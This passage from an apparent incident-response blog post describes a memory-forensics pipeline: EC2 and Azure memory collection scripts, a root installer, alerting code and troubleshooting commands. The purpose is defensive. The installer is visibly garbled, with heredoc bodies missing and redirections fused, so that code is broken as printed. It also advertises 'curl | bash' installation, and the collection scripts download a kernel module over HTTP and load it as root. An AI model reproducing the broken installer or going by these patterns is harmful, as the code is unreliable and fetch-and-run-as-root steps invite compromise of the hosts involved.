InstanceIds=[instance_id],\n        Hibernate=True  # Writes RAM to EBS volume\n    )\n\n    # Wait for instance to stop (hibernation saves RAM to disk)\n    log.info(f\"Waiting for {instance_id} to hibernate...\")\n    waiter = ec2.get_waiter('instance_stopped')\n    waiter.wait(InstanceIds=[instance_id])\n    log.info(\"Instance hibernated - RAM saved to EBS\")\n\n    # Get the root EBS volume\n    instance = ec2.describe_instances(InstanceIds=[instance_id])\n    root_device = instance['Reservations'][0]['Instances'][0]['RootDeviceName']\n    volumes = instance['Reservations'][0]['Instances'][0]['BlockDeviceMappings']\n\n    root_vol_id = None\n    for v in volumes:\n        if v['DeviceName'] == root_device:\n            root_vol_id = v['Ebs']['VolumeId']\n            break\n\n    if not root_vol_id:\n        log.error(\"Could not find root volume\")\n        return None\n\n    # Create snapshot of the hibernated volume (contains RAM image)\n    snapshot = ec2.create_snapshot(\n        VolumeId=root_vol_id,\n        Description=f\"IR memory collection {instance_id} {datetime.now().isoformat()}\",\n        TagSpecifications=[{\n            'ResourceType': 'snapshot',\n            'Tags': [{'Key': 'IR-Purpose', 'Value': 'memory-collection'}]\n        }]\n    )\n    snapshot_id = snapshot['SnapshotId']\n    log.info(f\"Snapshot created: {snapshot_id}\")\n\n    # Wait for snapshot to complete\n    log.info(\"Waiting for snapshot completion...\")\n    waiter = ec2.get_waiter('snapshot_completed')\n    waiter.wait(SnapshotIds=[snapshot_id])\n\n    # Restart the instance\n    ec2.start_instances(InstanceIds=[instance_id])\n    log.info(f\"Instance {instance_id} restarted\")\n\n    return snapshot_id\n\ndef collect_linux_ec2_ssm(\n    instance_id:   str,\n    region:        str = 'ap-southeast-2',\n    s3_bucket:     str = 'ir-memory-collection',\n    build_server:  str = 'http:\/\/192.168.1.100:8888\/lime'\n) -&gt; Optional[str]:\n    \"\"\"\n    Collect Linux EC2 
memory via SSM Run Command + LiME.\n    Uploads result directly to S3 to avoid cross-region transfer costs.\n    \"\"\"\n    ssm = boto3.client('ssm', region_name=region)\n    ec2 = boto3.client('ec2', region_name=region)\n\n    # Get instance details for kernel version\n    instance = ec2.describe_instances(InstanceIds=[instance_id])\n    instance_data = instance['Reservations'][0]['Instances'][0]\n    hostname = instance_data.get('PrivateDnsName', instance_id).split('.')[0]\n    timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')\n    s3_key = f\"memory-images\/{hostname}_{timestamp}.lime\"\n\n    collection_script = f\"\"\"#!\/bin\/bash\nset -euo pipefail\nKERNEL=$(uname -r)\nMODULE_URL=\"{build_server}\/lime-$KERNEL.ko\"\n# \/tmp must be disk-backed (not tmpfs) with room for the full image\nOUTPUT=\"\/tmp\/mem_ir_$KERNEL.lime\"\n\n# Download LiME module\ncurl -sf \"$MODULE_URL\" -o \/tmp\/lime_ir.ko || {{\n    echo \"LiME module not available for kernel $KERNEL\"\n    exit 1\n}}\n\n# Acquire memory\ninsmod \/tmp\/lime_ir.ko \"path=$OUTPUT format=lime timeout=0\"\nrmmod lime 2&gt;\/dev\/null || true\n\necho \"Image size: $(du -sh $OUTPUT)\"\necho \"SHA256: $(sha256sum $OUTPUT)\"\n\n# Upload directly to S3 (avoids egress through IR network)\naws s3 cp \"$OUTPUT\" \"s3:\/\/{s3_bucket}\/{s3_key}\" \\\n    --sse aws:kms \\\n    --no-progress\n\nrm -f \"$OUTPUT\" \/tmp\/lime_ir.ko\necho \"Upload complete: s3:\/\/{s3_bucket}\/{s3_key}\"\n\"\"\"\n\n    response = ssm.send_command(\n        InstanceIds=[instance_id],\n        DocumentName='AWS-RunShellScript',\n        # executionTimeout limits how long the script may run (seconds, as a string);\n        # TimeoutSeconds only limits how long SSM waits for the command to start\n        Parameters={'commands': [collection_script], 'executionTimeout': ['3600']},\n        Comment=f'IR memory collection {timestamp}',\n        TimeoutSeconds=3600,\n    )\n    command_id = response['Command']['CommandId']\n    log.info(f\"SSM command sent: {command_id}\")\n\n    # Poll for completion\n    while True:\n        time.sleep(30)\n        result = ssm.get_command_invocation(\n            CommandId=command_id,\n            InstanceId=instance_id\n        )\n        status = result['Status']\n     
   if status in ('Success', 'Failed', 'Cancelled', 'TimedOut'):\n            log.info(f\"SSM command {status}: {result.get('StandardOutputContent','')[-500:]}\")\n            break\n        log.info(f\"Collection in progress: {status}\")\n\n    return f\"s3:\/\/{s3_bucket}\/{s3_key}\" if status == 'Success' else None\n\ndef download_from_s3_to_pipeline(\n    s3_uri:     str,\n    local_dest: str,\n    region:     str = 'ap-southeast-2'\n) -&gt; bool:\n    \"\"\"Download collected image from S3 to local analysis pipeline.\"\"\"\n    import subprocess\n    bucket = s3_uri.replace('s3:\/\/', '').split('\/')[0]\n    key    = '\/'.join(s3_uri.replace('s3:\/\/', '').split('\/')[1:])\n\n    result = subprocess.run([\n        'aws', 's3', 'cp', s3_uri, local_dest,\n        '--region', region,\n        '--no-progress'\n    ], capture_output=True, text=True)\n\n    return result.returncode == 0<\/pre>\n<pre>## Azure VM memory collection\n## Uses Azure Run Command to execute collection scripts on VMs\n\n#!\/usr\/bin\/env python3\n\"\"\"Azure VM memory collection via Run Command API.\"\"\"\n\nfrom azure.identity import DefaultAzureCredential\nfrom azure.mgmt.compute import ComputeManagementClient\nimport time, logging\n\nlog = logging.getLogger(__name__)\n\ndef collect_azure_vm(\n    subscription_id: str,\n    resource_group:  str,\n    vm_name:         str,\n    storage_account: str,\n    container:       str = 'memory-images',\n    build_server:    str = 'http:\/\/192.168.1.100:8888\/lime'\n) -&gt; bool:\n    \"\"\"Run memory collection on an Azure VM via Run Command.\"\"\"\n\n    credential = DefaultAzureCredential()\n    compute    = ComputeManagementClient(credential, subscription_id)\n\n    # Get VM details\n    vm = compute.virtual_machines.get(resource_group, vm_name, expand='instanceView')\n    os_type   = vm.storage_profile.os_disk.os_type\n    timestamp = time.strftime('%Y%m%d_%H%M%S')\n    blob_name = f\"{vm_name}_{timestamp}\"\n\n    if os_type == 'Windows':\n     
   script = f\"\"\"\n$ErrorActionPreference = 'Stop'\n$timestamp = '{timestamp}'\n$hostname  = $env:COMPUTERNAME\n$output    = \"C:\\\\Windows\\\\Temp\\\\mem_ir_$timestamp.raw\"\n\n# Assumes winpmem_mini_x64.exe has been staged on the VM and is on PATH\nwinpmem_mini_x64.exe $output\n\n# Assumes the Az PowerShell module is installed and the VM has a managed\n# identity with write access to the storage container\nConnect-AzAccount -Identity | Out-Null\n$ctx = New-AzStorageContext -StorageAccountName '{storage_account}' `\n    -UseConnectedAccount\n# Brace the variable: \"$hostname_\" would be parsed as a variable named hostname_\nSet-AzStorageBlobContent -File $output `\n    -Container '{container}' `\n    -Blob \"${{hostname}}_$timestamp.raw\" `\n    -Context $ctx\n\nRemove-Item $output -Force\nWrite-Output 'Upload complete'\n\"\"\"\n        script_type = 'RunPowerShellScript'\n\n    else:  # Linux\n        script = f\"\"\"#!\/bin\/bash\nset -euo pipefail\nKERNEL=$(uname -r)\nOUTPUT=\"\/tmp\/mem_ir_{timestamp}.lime\"\n# Double quotes so that $KERNEL expands inside the URL\ncurl -sf \"{build_server}\/lime-$KERNEL.ko\" -o \/tmp\/lime_ir.ko\ninsmod \/tmp\/lime_ir.ko \"path=$OUTPUT format=lime timeout=0\"\nrmmod lime 2&gt;\/dev\/null || true\n# Assumes the Azure CLI is installed and the VM has a managed identity\naz login --identity --output none\naz storage blob upload --account-name '{storage_account}' \\\\\n    --container-name '{container}' \\\\\n    --name '{vm_name}_{timestamp}.lime' \\\\\n    --file \"$OUTPUT\" --auth-mode login\nrm -f \"$OUTPUT\" \/tmp\/lime_ir.ko\necho 'Upload complete'\n\"\"\"\n        script_type = 'RunShellScript'\n\n    # Execute via Run Command\n    poller = compute.virtual_machines.begin_run_command(\n        resource_group, vm_name,\n        {'command_id': script_type, 'script': [script]}\n    )\n    result = poller.result(timeout=3600)\n    output = result.value[0].message if result.value else ''\n    log.info(f\"Azure collection complete for {vm_name}: {output[-200:]}\")\n    # Both scripts print this marker only after the upload has succeeded\n    return 'upload complete' in output.lower()<\/pre>\n<h3>One-shot pipeline installer<\/h3>\n<p>Everything in this post requires coordinated setup across multiple components. The one-shot installer below handles the complete pipeline deployment on a fresh Ubuntu 22.04 analysis server. Run it once, answer two prompts, and the full stack is operational. 
It is designed to be idempotent: running it a second time updates components without breaking what is already working.<\/p>\n<pre>#!\/bin\/bash\n## install_memory_pipeline.sh\n## One-shot installer for the complete memory analysis pipeline\n## Ubuntu 22.04 LTS - run as root\n## Usage: curl -fsSL https:\/\/raw.githubusercontent.com\/yourrepo\/memory-pipeline\/main\/install.sh | bash\n\nset -euo pipefail\n\nPIPELINE_VERSION=\"1.0.0\"\nPIPELINE_DIR=\"\/srv\/memory\"\nVENV_DIR=\"\/opt\/vol3-env\"\nDB_PASSWORD=$(openssl rand -base64 24 | tr -d '\/+=' | head -c 20)\nANALYST_PASSWORD=$(openssl rand -base64 24 | tr -d '\/+=' | head -c 20)\n\nRED='\\033[0;31m'; GREEN='\\033[0;32m'; YELLOW='\\033[1;33m'; NC='\\033[0m'\nlog_ok()   { echo -e \"${GREEN}[+]${NC} $*\"; }\nlog_info() { echo -e \"${YELLOW}[*]${NC} $*\"; }\nlog_err()  { echo -e \"${RED}[!]${NC} $*\"; }\n\necho \"==================================================\"\necho \" Memory Analysis Pipeline Installer v${PIPELINE_VERSION}\"\necho \" Analysis server setup for fleet IR\"\necho \"==================================================\"\necho\n\n# Preflight checks\n[[ $EUID -ne 0 ]] &amp;&amp; { log_err \"Run as root\"; exit 1; }\n[[ $(lsb_release -rs) != \"22.04\" ]] &amp;&amp; log_info \"Tested on Ubuntu 22.04 - other versions may work\"\n\n# Gather config (prompts read from \/dev\/tty because under curl | bash, stdin is the script itself)\nread -r -p \"Analysis server IP (for Velociraptor\/dashboard access): \" SERVER_IP &lt; \/dev\/tty\nread -r -p \"Velociraptor server IP (or same as above): \" VR_SERVER_IP &lt; \/dev\/tty\nSERVER_IP=${SERVER_IP:-$(hostname -I | awk '{print $1}')}\nVR_SERVER_IP=${VR_SERVER_IP:-$SERVER_IP}\n\nlog_info \"Installing system packages\"\napt-get update -qq\nDEBIAN_FRONTEND=noninteractive apt-get install -y -qq \\\n    python3 python3-pip python3-venv python3-dev \\\n    git curl wget jq bc \\\n    parallel yara foremost bulk-extractor sleuthkit \\\n    docker.io docker-compose \\\n    postgresql-14 postgresql-client-14 \\\n    redis-server \\\n    nginx \\\n    smbclient \\\n    p7zip-full unzip \\\n 
   net-tools iotop iftop \\\n    libssl-dev libffi-dev libpq-dev \\\n    build-essential\n\nlog_ok \"System packages installed\"\n\n# Create analyst user\nif ! id analyst &amp;&gt;\/dev\/null; then\n    useradd -m -s \/bin\/bash analyst\n    usermod -aG docker analyst\n    log_ok \"Analyst user created\"\nfi\n\n# Directory structure\nmkdir -p $PIPELINE_DIR\/{landing,processing,complete,reports,yara_rules\/rules,logs,tools,lime_modules}\nmkdir -p $PIPELINE_DIR\/yara_rules\/clean_samples\nmkdir -p \/etc\/memory-ir\nchown -R analyst:analyst $PIPELINE_DIR\nlog_ok \"Directory structure created\"\n\n# Python virtual environment\nlog_info \"Setting up Python environment\"\npython3 -m venv $VENV_DIR\nsource $VENV_DIR\/bin\/activate\npip install --upgrade pip -q\npip install -q \\\n    volatility3 \\\n    yara-python \\\n    pefile \\\n    capstone \\\n    python-magic \\\n    requests \\\n    psycopg2-binary \\\n    redis \\\n    celery[redis] \\\n    flower \\\n    jinja2 \\\n    flask \\\n    watchdog \\\n    boto3 \\\n    azure-identity \\\n    azure-mgmt-compute\nlog_ok \"Python environment ready: $(vol --version)\"\n\n# Volatility symbols\nlog_info \"Downloading Volatility symbol tables (this takes a few minutes)\"\nmkdir -p \/opt\/vol3-symbols\nif [ ! 
-f \/opt\/vol3-symbols\/windows.zip ]; then\n    wget -q --show-progress \\\n        https:\/\/downloads.volatilityfoundation.org\/volatility3\/symbols\/windows.zip \\\n        -O \/opt\/vol3-symbols\/windows.zip\n    cd \/opt\/vol3-symbols\n    unzip -q windows.zip -d windows\/\nfi\nSITE_PKGS=$(python3 -c \"import site; print(site.getsitepackages()[0])\")\nln -sf \/opt\/vol3-symbols \"$SITE_PKGS\/volatility3\/symbols\" 2&gt;\/dev\/null || true\nlog_ok \"Volatility symbols installed\"\n\n# PostgreSQL\nlog_info \"Configuring PostgreSQL\"\nsystemctl start postgresql\nsystemctl enable postgresql\n\nsudo -u postgres psql -q &lt; \/etc\/memory-ir\/db.env &lt;&lt; DBEOF\nPOSTGRES_URL=postgresql:\/\/analyst:${DB_PASSWORD}@localhost\/memory_analysis\nCELERY_BROKER_URL=redis:\/\/localhost:6379\/0\nDBEOF\nchmod 640 \/etc\/memory-ir\/db.env\nchown analyst:analyst \/etc\/memory-ir\/db.env\n\n# Initialize schema\nsource \/etc\/memory-ir\/db.env\nPGPASSWORD=$DB_PASSWORD psql -U analyst -d memory_analysis -h localhost &lt;\/dev\/null || \\\n    log_info \"WinPmem download failed - download manually from $WINPMEM_URL\"\n\n# Systemd services\nlog_info \"Installing systemd services\"\n\n# Image watcher service\ncat &gt; \/etc\/systemd\/system\/memory-watcher.service &lt; \/etc\/systemd\/system\/memory-celery-triage.service &lt; \/etc\/systemd\/system\/memory-celery-deep.service &lt; \/root\/memory-pipeline-credentials.txt &lt;&lt; CREDEOF\nMemory Analysis Pipeline - Installation Credentials\n====================================================\nGenerated: $(date)\nServer IP: $SERVER_IP\n\nPostgreSQL:\n  Host:     localhost\n  Database: memory_analysis\n  User:     analyst\n  Password: $DB_PASSWORD\n  URL:      postgresql:\/\/analyst:${DB_PASSWORD}@localhost\/memory_analysis\n\nDashboard:\n  URL:  http:\/\/${SERVER_IP}:8080\n\nCelery Monitor (Flower):\n  URL:  http:\/\/${SERVER_IP}:5555\n\nPipeline directories:\n  Landing:    $PIPELINE_DIR\/landing\n  Reports:    
$PIPELINE_DIR\/reports\n  Logs:       $PIPELINE_DIR\/logs\n  Yara rules: $PIPELINE_DIR\/yara_rules\/rules\/\nCREDEOF\nchmod 600 \/root\/memory-pipeline-credentials.txt\n\necho\necho &quot;==================================================&quot;\nlog_ok &quot;Installation complete!&quot;\necho &quot;==================================================&quot;\necho\necho &quot;Next steps:&quot;\necho &quot;  1. Copy pipeline scripts to $PIPELINE_DIR\/pipeline\/&quot;\necho &quot;  2. Add your Yara rules to $PIPELINE_DIR\/yara_rules\/rules\/&quot;\necho &quot;  3. Start services: systemctl start memory-watcher memory-celery-triage memory-celery-deep&quot;\necho &quot;  4. Check credentials: cat \/root\/memory-pipeline-credentials.txt&quot;\necho &quot;  5. Drop a test image into $PIPELINE_DIR\/landing\/ and watch the logs&quot;\necho\necho &quot;Dashboard will be available at: http:\/\/${SERVER_IP}:8080&quot;<\/pre>\n<h3>Alert integration: Slack, email, and PagerDuty notifications<\/h3>\n<p>A pipeline that silently processes images and writes results to a database is only useful if analysts are notified when high-risk findings arrive. 
The alert integration hooks into the report generation stage of the Celery pipeline and fires notifications through whichever channel your team monitors during incidents.<\/p>\n<pre>## pipeline\/alerts.py - Multi-channel alerting for critical findings\n\nimport os\nimport json\nimport logging\nimport smtplib\nimport requests\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom typing import Dict, Optional\n\nlog = logging.getLogger(__name__)\n\n# Configuration - set via environment variables\nSLACK_WEBHOOK_URL  = os.environ.get('SLACK_WEBHOOK_URL', '')\nPAGERDUTY_KEY      = os.environ.get('PAGERDUTY_INTEGRATION_KEY', '')\nALERT_EMAIL_FROM   = os.environ.get('ALERT_EMAIL_FROM', '')\nALERT_EMAIL_TO     = os.environ.get('ALERT_EMAIL_TO', '')\nSMTP_HOST          = os.environ.get('SMTP_HOST', 'localhost')\nSMTP_PORT          = int(os.environ.get('SMTP_PORT', '587'))\nDASHBOARD_URL      = os.environ.get('DASHBOARD_URL', 'http:\/\/localhost:8080')\n\ndef send_slack_alert(report: Dict) -&gt; bool:\n    \"\"\"Send a Slack notification for high\/critical findings.\"\"\"\n    if not SLACK_WEBHOOK_URL:\n        return False\n\n    hostname    = report.get('hostname', 'unknown')\n    risk_label  = report.get('risk_label', 'UNKNOWN')\n    risk_score  = report.get('risk_score', 0)\n    image_id    = report.get('image_id', 0)\n    has_malfind = report.get('has_malfind', False)\n    ioc_count   = report.get('ioc_count', 0)\n    susp_procs  = report.get('suspicious_procs', 0)\n\n    colour = {\n        'CRITICAL': '#FF0000',\n        'HIGH':     '#FF8C00',\n        'MEDIUM':   '#FFD700',\n        'LOW':      '#00FF00',\n    }.get(risk_label, '#808080')\n\n    # Build IOC summary\n    ioc_summary = ''\n    if report.get('iocs'):\n        top_iocs = report['iocs'][:5]\n        ioc_summary = '\\n'.join(\n            f\"  `{i['type']}`: {i['value'][:60]}\" for i in top_iocs\n        )\n        if len(report['iocs']) &gt; 5:\n            ioc_summary 
+= f\"\\n  ...and {len(report['iocs'])-5} more\"\n\n    payload = {\n        'attachments': [{\n            'color': colour,\n            'title': f\":rotating_light: Memory Analysis Alert: {hostname}\",\n            'title_link': f\"{DASHBOARD_URL}\/host\/{image_id}\",\n            'fields': [\n                {'title': 'Risk Level',    'value': risk_label,       'short': True},\n                {'title': 'Risk Score',    'value': str(risk_score),  'short': True},\n                {'title': 'Malfind',       'value': 'YES :red_circle:' if has_malfind else 'No', 'short': True},\n                {'title': 'IOCs Found',    'value': str(ioc_count),   'short': True},\n                {'title': 'Suspicious Processes', 'value': str(susp_procs), 'short': True},\n            ],\n            'text': f\"*Top IOCs:*\\n{ioc_summary}\" if ioc_summary else '',\n            'footer': 'Memory Analysis Pipeline',\n            'ts':     int(__import__('time').time()),\n        }]\n    }\n\n    try:\n        resp = requests.post(SLACK_WEBHOOK_URL, json=payload, timeout=10)\n        resp.raise_for_status()\n        log.info(f\"Slack alert sent for {hostname}\")\n        return True\n    except Exception as e:\n        log.error(f\"Slack alert failed: {e}\")\n        return False\n\ndef send_pagerduty_alert(report: Dict) -&gt; bool:\n    \"\"\"Create a PagerDuty incident for critical findings.\"\"\"\n    if not PAGERDUTY_KEY or report.get('risk_label') != 'CRITICAL':\n        return False\n\n    hostname = report.get('hostname', 'unknown')\n    payload = {\n        'routing_key':  PAGERDUTY_KEY,\n        'event_action': 'trigger',\n        'dedup_key':    f\"memory-ir-{hostname}-{report.get('image_id')}\",\n        'payload': {\n            'summary':    f\"CRITICAL memory finding on {hostname} - Score: {report.get('risk_score')}\",\n            'severity':   'critical',\n            'source':     'memory-analysis-pipeline',\n            'component':  hostname,\n            'group':     
 'incident-response',\n            'class':      'memory-forensics',\n            'custom_details': {\n                'image_id':           report.get('image_id'),\n                'has_malfind':        report.get('has_malfind'),\n                'ioc_count':          report.get('ioc_count'),\n                'suspicious_procs':   report.get('suspicious_procs'),\n                'dashboard_url':      f\"{DASHBOARD_URL}\/host\/{report.get('image_id')}\",\n                'top_iocs':           report.get('iocs', [])[:3],\n            }\n        },\n        'links': [{\n            'href': f\"{DASHBOARD_URL}\/host\/{report.get('image_id')}\",\n            'text': 'View in Dashboard'\n        }]\n    }\n\n    try:\n        resp = requests.post(\n            'https:\/\/events.pagerduty.com\/v2\/enqueue',\n            json=payload, timeout=10\n        )\n        resp.raise_for_status()\n        log.info(f\"PagerDuty incident created for {hostname}\")\n        return True\n    except Exception as e:\n        log.error(f\"PagerDuty alert failed: {e}\")\n        return False\n\ndef send_email_alert(report: Dict) -&gt; bool:\n    \"\"\"Send an email alert for high and critical findings.\"\"\"\n    if not all([ALERT_EMAIL_FROM, ALERT_EMAIL_TO, SMTP_HOST]):\n        return False\n\n    hostname   = report.get('hostname', 'unknown')\n    risk_label = report.get('risk_label', 'UNKNOWN')\n\n    subject = f\"[{risk_label}] Memory Analysis Alert: {hostname}\"\n\n    body = f\"\"\"\nMemory Analysis Pipeline Alert\n================================\n\nHost:         {hostname}\nRisk Level:   {risk_label}\nRisk Score:   {report.get('risk_score', 0)}\nImage ID:     {report.get('image_id')}\nHas Malfind:  {'YES - INJECTION DETECTED' if report.get('has_malfind') else 'No'}\nIOCs Found:   {report.get('ioc_count', 0)}\nSusp. 
Procs:  {report.get('suspicious_procs', 0)}\n\nDashboard: {DASHBOARD_URL}\/host\/{report.get('image_id')}\n\nTop IOCs:\n\"\"\"\n    for ioc in report.get('iocs', [])[:10]:\n        body += f\"  [{ioc['type']}] {ioc['value']}\\n\"\n\n    if report.get('malfind_regions'):\n        body += \"\\nInjection Indicators:\\n\"\n        for m in report['malfind_regions'][:5]:\n            body += f\"  PID {m['pid']} ({m['process']}): {m['protection']} \"\n            body += f\"PE={'YES' if m.get('has_pe') else 'no'} Risk={m['risk']}\\n\"\n\n    body += \"\\n--\\nMemory Analysis Pipeline - automated notification\"\n\n    msg = MIMEMultipart()\n    msg['From']    = ALERT_EMAIL_FROM\n    msg['To']      = ALERT_EMAIL_TO\n    msg['Subject'] = subject\n    msg.attach(MIMEText(body, 'plain'))\n\n    try:\n        with smtplib.SMTP(SMTP_HOST, SMTP_PORT, timeout=15) as smtp:\n            smtp.starttls()\n            smtp.sendmail(ALERT_EMAIL_FROM, [ALERT_EMAIL_TO], msg.as_string())\n        log.info(f\"Email alert sent for {hostname}\")\n        return True\n    except Exception as e:\n        log.error(f\"Email alert failed: {e}\")\n        return False\n\ndef fire_alerts(report: Dict) -&gt; None:\n    \"\"\"Fire all configured alerts for a completed analysis report.\"\"\"\n    risk_label = report.get('risk_label', 'LOW')\n\n    if risk_label not in ('HIGH', 'CRITICAL'):\n        return\n\n    hostname = report.get('hostname', 'unknown')\n    log.info(f\"Firing alerts for {hostname} (risk={risk_label})\")\n\n    send_slack_alert(report)\n    send_email_alert(report)\n\n    if risk_label == 'CRITICAL':\n        send_pagerduty_alert(report)\n\n## Add to \/etc\/memory-ir\/alerts.env and load in all service unit files:\n# SLACK_WEBHOOK_URL=https:\/\/hooks.slack.com\/services\/YOUR\/WEBHOOK\/URL\n# PAGERDUTY_INTEGRATION_KEY=your_pd_integration_key\n# ALERT_EMAIL_FROM=memory-pipeline@corp.local\n# ALERT_EMAIL_TO=ir-team@corp.local\n# SMTP_HOST=smtp.corp.local\n# SMTP_PORT=587\n# 
DASHBOARD_URL=http:\/\/192.168.1.100:8080<\/pre>\n<h3>Troubleshooting: common failures and fixes<\/h3>\n<p>These are the failures that actually happen in production deployments, with the specific fix for each one.<\/p>\n<p><strong>Volatility fails with &#8220;A symbol table requirement was not fulfilled&#8221;.<\/strong> This means Volatility 3 could not find a symbol table matching the kernel build in the memory image (the Volatility 2 message for a similar failure is &#8220;No suitable address space mapping found&#8221;). The most common cause is missing or misplaced symbol tables. Check that Volatility can see them:<\/p>\n<pre>## Symbol table troubleshooting\nsource \/opt\/vol3-env\/bin\/activate\n\n# Verify symbols are accessible: Volatility 3 reads the unextracted\n# windows.zip pack or extracted files under windows\/\npython3 -c \"\nimport os\nimport volatility3.symbols\nfor sym_path in volatility3.symbols.__path__:\n    print('Symbol path:', sym_path)\n    print('  windows.zip present:', os.path.isfile(os.path.join(sym_path, 'windows.zip')))\n    win_dir = os.path.join(sym_path, 'windows')\n    if os.path.isdir(win_dir):\n        print('  windows\/ entries:', len(os.listdir(win_dir)))\n    else:\n        print('  no windows\/ directory')\n\"\n\n# If symbols are missing, re-download the pack and copy the zip,\n# unextracted, into the package's symbols directory\nwget -q https:\/\/downloads.volatilityfoundation.org\/volatility3\/symbols\/windows.zip \\\n    -O \/tmp\/windows.zip\nSITE=$(python3 -c \"import site; print(site.getsitepackages()[0])\")\ncp \/tmp\/windows.zip \"$SITE\/volatility3\/symbols\/\"\necho \"Symbol pack installed\"\n\n# Test with a real image (-s adds \/opt\/vol3-symbols to the symbol search path)\nvol -s \/opt\/vol3-symbols -f \/srv\/memory\/landing\/test.raw windows.info 2&gt;&amp;1 | head -20<\/pre>\n<p><strong>Image watcher detects the file but pipeline does not start.<\/strong> The file was detected, but no Celery worker is processing tasks. 
Check that the worker is actually running and connected to Redis:<\/p>\n<pre>## Pipeline connectivity troubleshooting\n\n# Check Celery workers are running\nsystemctl status memory-celery-triage memory-celery-deep\n\n# Check Redis is reachable\nredis-cli ping  # Should return PONG\n\n# Count tasks waiting in each queue (a count that keeps growing means no worker is consuming it)\nredis-cli llen celery  # Default queue\nredis-cli llen triage  # Triage queue\n\n# See what each worker is executing, has scheduled, and has reserved but not started\n# (run from the directory that contains the pipeline module so -A pipeline can import it)\nsource \/opt\/vol3-env\/bin\/activate\ncd \/srv\/memory\/pipeline\ncelery -A pipeline inspect active\ncelery -A pipeline inspect scheduled\ncelery -A pipeline inspect reserved\n\n# Manually trigger pipeline for an existing image\npython3 -c \"\nimport sys\nsys.path.insert(0, '\/srv\/memory\/pipeline')\nfrom pipeline import validate_image\nvalidate_image.delay(int(sys.argv[1]))\nprint('Task queued')\n\" 123  # Replace 123 with the image ID from the database\n\n# Watch the triage worker log in real time\ntail -f \/srv\/memory\/logs\/celery_triage.log<\/pre>\n<p><strong>Memory image SHA256 does not match expected value.<\/strong> The image was corrupted or truncated in transit. This happens most commonly when the network drops mid-transfer or when the watcher picked up a file that was still being written. 
The validation stage catches this and marks the image as invalid, but the image needs to be re-collected:<\/p>\n<pre>## Handling corrupt or partial images\n\n# Check which images failed validation\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT id, hostname, status, image_size_gb, sha256\nFROM memory_images\nWHERE status IN ('validation_failed', 'pending')\nORDER BY received_at DESC;\"\n\n# Check whether the image file looks complete\npython3 -c \"\nimport sys\nfrom pathlib import Path\nimg = Path(sys.argv[1])\nsize = img.stat().st_size\n# Compare with the expected size for the host's RAM, e.g. ~10 GB\n# for a 16 GB host at the 0.65 compression ratio used earlier\nprint(f'File: {img.name}')\nprint(f'Size: {size \/ 1e9:.2f} GB')\n# Heuristic only: an all-zero tail can mean a pre-allocated file that was\n# never fully written, but raw images can also legitimately end in zeroed pages\nwith open(img, 'rb') as f:\n    f.seek(max(size - 1024, 0))\n    tail = f.read(1024)\nprint(f'Last 1KB: {len(set(tail))} distinct byte values, all zero: {not any(tail)}')\n\" \/srv\/memory\/landing\/suspicious_image.raw\n\n# Reset a re-collected image so it is processed again\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nUPDATE memory_images SET status = 'received' WHERE id = 123;\"\n# Then manually trigger: validate_image.delay(123)<\/pre>\n<p><strong>Malfind returns no results on a known-compromised image.<\/strong> There are two common causes. First, if the target is a 32-bit (WOW64) process on a 64-bit host, confirm the process bitness and inspect its VADs directly rather than relying on malfind alone. 
Second, malfind only flags regions whose VAD protection is both writable and executable, and it can only inspect pages that were resident in RAM when the image was taken. It will miss payloads that were paged out at acquisition time. It will also miss regions allocated read-write and later made executable with VirtualProtect, because the VAD keeps the original protection. Module stomping, which hides code inside a legitimately loaded DLL, is missed for the same reason.<\/p>\n<pre>## Malfind troubleshooting\n\n# Check the OS and process bitness\nvol -f memory.raw windows.info\nvol -f memory.raw windows.pslist | head -20\n\n# Try running malfind against a specific PID explicitly\nvol -f memory.raw windows.malfind --pid 1234\n\n# If malfind misses things, list every executable VAD for the process\nvol -f memory.raw windows.vadinfo --pid 1234 | grep EXECUTE\n\n# Narrow that to writable-and-executable regions (vadinfo prints PAGE_* protection names)\nvol -f memory.raw windows.vadinfo --pid 1234 | \\\n    grep -E \"PAGE_EXECUTE_(READWRITE|WRITECOPY)\"\n\n# For 32-bit processes on 64-bit systems, check the process bitness:\n# the Wow64 column in pslist is True for 32-bit (WOW64) processes\nvol -f memory.raw windows.pslist --pid 1234<\/pre>\n<p><strong>Pipeline processes images but risk scores are all zero.<\/strong> The triage stage ran but found nothing suspicious. This is usually correct, but if you know the image is from a compromised host, the anomaly detection rules need tuning for your environment. 
The most common cause is that the suspicious parent-child pairs in the triage code do not match the specific process names on that system:<\/p>\n<pre>## Risk scoring troubleshooting\n\n# Check what the triage actually found\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT\n    mi.hostname,\n    tr.process_count,\n    tr.suspicious_process_count,\n    tr.network_conn_count,\n    tr.risk_score,\n    tr.triage_summary\nFROM memory_images mi\nLEFT JOIN triage_results tr ON tr.image_id = mi.id\nWHERE mi.id = 123;\"\n\n# List all processes that were analysed\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT pid, ppid, name, path, is_suspicious, suspicious_reason\nFROM process_list\nWHERE image_id = 123\nORDER BY is_suspicious DESC, pid;\"\n\n# If you know a specific process is malicious but it was not flagged,\n# check what parent name the triage code saw vs what was expected\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis -c \"\nSELECT pl.pid, pl.name, pl.path,\n       parent.name AS parent_name\nFROM process_list pl\nLEFT JOIN process_list parent ON parent.pid = pl.ppid AND parent.image_id = pl.image_id\nWHERE pl.image_id = 123\nORDER BY pl.pid;\"<\/pre>\n<h3>End-to-end worked example: a simulated ransomware incident<\/h3>\n<p>This section walks through the complete pipeline from the moment a threat is detected through to a final analyst report, using a realistic scenario. It is 07:15 UTC on a Monday morning. The SOC receives an alert that a domain controller (DC01, 64GB RAM) and three workstations (WS-FINANCE-01, WS-FINANCE-02, WS-FINANCE-03, 16GB RAM each) are generating unusual SMB activity, and files with encrypted extensions are appearing on a file server. 
